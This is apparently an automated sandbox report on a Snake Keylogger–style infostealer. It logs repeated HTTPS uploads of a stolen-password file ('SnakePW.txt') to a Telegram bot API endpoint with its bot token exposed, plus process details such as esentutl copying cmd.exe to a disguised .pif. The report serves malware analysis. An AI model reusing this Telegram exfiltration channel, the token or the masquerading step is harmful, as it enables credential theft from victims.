                                                                                                                2024-11-26 07:26:44 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 39 30 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 36 30 30 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389044,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732606003,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                104192.168.2.750049149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:43 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd14c06965d3a2
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:43 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 34 63 30 36 39 36 35 64 33 61 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd14c06965d3a2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:26:44 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:43 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:44 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 39 30 34 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 36 30 30 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389045,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732606003,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                105192.168.2.750048149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:43 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd1220a2538758
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:43 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 32 32 30 61 32 35 33 38 37 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd1220a2538758Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:26:44 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:43 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:44 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 39 30 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 36 30 30 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389046,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732606003,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                106192.168.2.750057149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:45 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd12a00e36c4c0
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:45 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 32 61 30 30 65 33 36 63 34 63 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd12a00e36c4c0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:26:46 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:45 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:46 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 39 30 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 36 30 30 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389050,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732606005,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                107192.168.2.750055149.154.167.2204437924C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:45 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd12a75cd9b643
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:45 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 32 61 37 35 63 64 39 62 36 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 34 3a 30 33 3a 31 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd12a75cd9b643Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:26:46 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:45 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:46 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 39 30 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 36 30 30 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389051,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732606005,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                108192.168.2.750056149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:45 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd155c28fa062f
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:45 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 35 35 63 32 38 66 61 30 36 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd155c28fa062fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:26:46 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:45 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:46 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 39 30 35 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 36 30 30 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389053,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732606005,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                109192.168.2.750070149.154.167.220443
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:50 UTC358OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0dcf78ef9f83
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-11-26 07:26:50 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 64 63 66 37 38 65 66 39 66 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 34 3a 30 33 3a 31 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0dcf78ef9f83Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:26:51 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:51 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:51 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 39 30 35 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 36 30 31 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389056,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732606011,"documen


                                                                                                                Statistics

                                                                                                                CPU Usage

                                                                                                                Click to jump to process

                                                                                                                Memory Usage

                                                                                                                Click to jump to process

                                                                                                                High Level Behavior Distribution

                                                                                                                Click to dive into process behavior distribution

                                                                                                                Behavior

                                                                                                                Click to jump to process

                                                                                                                System Behavior

                                                                                                                General

                                                                                                                Target ID:0
                                                                                                                Start time:02:24:39
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\user\Desktop\EPTMAcgvNZ.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\EPTMAcgvNZ.exe"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:1'297'920 bytes
                                                                                                                MD5 hash:DC614075998696B44ADA8A2EED23FC03
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:Borland Delphi
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:9
                                                                                                                Start time:02:24:48
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\yihfsboC.cmd" "
                                                                                                                Imagebase:0x410000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:10
                                                                                                                Start time:02:24:48
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:11
                                                                                                                Start time:02:24:48
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                                                                                Imagebase:0x9c0000
                                                                                                                File size:352'768 bytes
                                                                                                                MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:12
                                                                                                                Start time:02:24:49
                                                                                                                Start date:26/11/2024
